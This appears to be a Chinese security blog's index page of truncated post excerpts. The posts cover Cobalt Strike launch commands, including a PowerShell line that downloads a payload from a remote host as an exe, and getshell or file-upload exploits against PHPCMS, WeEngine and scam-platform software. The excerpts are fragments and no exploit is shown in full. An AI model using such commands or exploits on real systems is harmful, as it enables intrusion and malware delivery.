Cobaltstrike上线方式汇总

Cobaltstrike上线方式汇总

序言收集一些常用的cs上线的指令,有备无患。持续收集。。Part.1 powershell远程下载本地保存powershell (new-object System.Net.WebClient).DownloadFile('http://soga/1.txt','1.exe')无文件落地power...
微擎cms后台Getshell

微擎cms后台Getshell

Part.1 环境漏洞环境apachephp7.2版本: v1.8.2(201812130002)Part.2步骤站点-附件设置-支持文件后缀在安装完成的时候,数据库里面并没有写入上传类型的数据 需要自己添加允许上传的后缀 然后才会写入数据库a:3:{s:16:"...
PHPCMS V9.6.3 后台配置文件getshell

PHPCMS V9.6.3 后台配置文件getshell

Part.1 环境LOCALHOSTPHPSTUDYNGINXPHP5.3mysql5.5源码在源码之家下载的phpcmsV9.6.3 utf8Part.2 过程进入后台->基本设置->connect以上不管是哪一个KEY设置的地方写入任意到配置文件中找到\www\phpcms\caches\configs...
某qp文件上传漏洞+SQL

某qp文件上传漏洞+SQL

Part.1 任意文件上传POST /Ajax/UploadImgHandler.ashx HTTP/1.1Host: hostContent-Length: 2678Accept: */*Origin: http://host/X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleW...
某微交易场外黑平台漏洞合集

某微交易场外黑平台漏洞合集

Part.1 构造在/application/admin/controller/Base.php<?phpnamespace app\admin\controller;use think\Controller;use think\Db;class Base extends Controller{ public function __construct(){ parent::__co...
某杀猪盘文件上传漏洞

某杀猪盘文件上传漏洞

序言这套程序是今年比较流行的,当时碰到的是基于thinkphp3.2.3的。可惜没有找到这种类型的了,后面我在一个受害群看到了这套系统,基于tp5修改的。相似很高。贴出前台与后台的图片Part1首先先注册一个账号登陆头像上传POST /h...
某PHP客服系统文件上传漏洞

某PHP客服系统文件上传漏洞

序言偶感而发 ,散发思维访问:/index/index/home?visiter_id=&visiter_name=&avatar=&business_id=1&groupid=0&special=1 默认ID为1 接入客服 不然无法上传文件 /admin/login/index/business_id/1....
XX漫画任意文件上传漏洞

XX漫画任意文件上传漏洞

序言获取一个账号,然后随便点击一个漫画。可以注入,但是用处不大。基本都不是root权限。有兴趣的自行测试。就算你得到了管理的账号密码也是加了料的。因为我进去过一个后台。苦于无法拿到权限。so!开始了漫长的找源码之旅...
几个步骤做好关键词SEO优化

几个步骤做好关键词SEO优化

序言网站优化对网站至关重要,可以直接影响和决定平台网站的作用和不同地区的综合排名。在进行Seo优化的过程中,我们必须坚持特定的原则,只有真正做好这些事情,才能保证最终结果,这对我们来说是非常重要的。做好以下几点...